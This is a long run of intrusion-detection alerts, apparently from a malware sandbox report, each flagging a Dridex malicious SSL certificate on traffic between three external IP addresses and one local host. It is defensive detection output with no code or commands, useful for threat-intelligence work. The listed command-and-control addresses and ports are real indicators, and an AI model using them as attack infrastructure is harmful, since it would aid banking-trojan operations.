                                                                                                                                01/11/21-20:48:10.973087TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:12.337016TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:12.856122TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:13.352687TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:13.352687TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:14.395801TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922477.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:14.919524TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:15.430843TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:15.430843TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:17.015165TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:17.530500TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:19.036961TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:19.036961TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:20.087624TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:20.629875TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:21.160457TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:21.160457TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:22.192376TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:22.717566TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:23.234296TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:23.234296TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:24.263045TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:24.796829TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:25.335003TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:25.335003TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:26.370615TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:26.884548TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:27.420708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:27.420708TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:28.459826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:29.000097TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:29.527147TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:29.527147TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:30.625606TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:31.146087TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:31.662791TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:31.662791TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:32.715358TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:33.228364TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:33.749819TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:33.749819TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:34.991721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:35.880142TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:36.405856TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:36.405856TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:37.467885TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:37.994826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:38.519760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:38.519760TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:39.556782TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:40.066731TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:40.577625TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:40.577625TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:41.984070TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:42.499308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:43.018257TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:43.018257TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:44.053274TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:44.579320TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:45.104603TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:45.104603TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:46.141495TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:46.666241TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:47.182448TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:47.182448TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:48.231998TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:48.761039TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:49.562937TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:49.562937TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:50.588831TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:51.108516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:51.737151TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:51.737151TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:53.152587TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:53.702863TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:54.232464TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:54.232464TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:55.305953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:55.823725TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:56.353899TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:56.353899TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:57.392349TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:57.929658TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:58.470993TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:58.470993TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:59.528377TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:00.055573TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:00.575455TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:00.575455TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:01.635516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:02.151598TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:02.678194TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:02.678194TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:03.742064TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:04.263567TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:04.784140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493155.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:04.784140TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493155.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:05.829691TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:06.356350TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:06.866466TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493195.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:06.866466TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493195.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:07.983522TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:08.507501TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:09.032820TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493235.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:09.032820TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493235.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:10.091631TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:10.363346TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:10.972908TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:11.504123TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:11.504123TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493275.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:12.602010TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:13.124299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:13.647090TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:13.647090TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493315.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:14.691394TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:15.213466TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:15.735215TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:15.735215TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493355.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:16.782727TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:17.307734TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:17.845777TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:17.845777TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493395.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:18.908240TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:19.428815TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:19.962769TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:19.962769TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493435.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:21.025765TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:21.550932TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:22.094290TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:22.094290TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493475.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:23.132543TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:23.657512TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:24.190173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:24.190173TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493515.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:25.253666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:25.778099TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:26.317167TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:26.317167TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493555.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:27.361910TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:27.885060TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:28.424659TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:28.424659TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493595.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:29.545079TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:30.059527TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:30.604198TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:30.604198TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493635.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:31.731227TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:32.307576TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:32.830426TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:32.830426TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493675.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:33.865738TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:34.371379TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:34.887141TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:34.887141TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493715.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:35.922478TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:36.450784TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:36.959756TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:36.959756TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493755.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:38.016786TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:38.589462TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937880.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:39.231635TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:39.231635TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493795.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:40.432839TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:40.959328TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:41.496822TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:41.496822TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493835.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:42.567637TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:43.100887TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:43.625308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:43.625308TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493875.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:44.693638TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:45.218520TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939080.86.91.27192.168.2.22
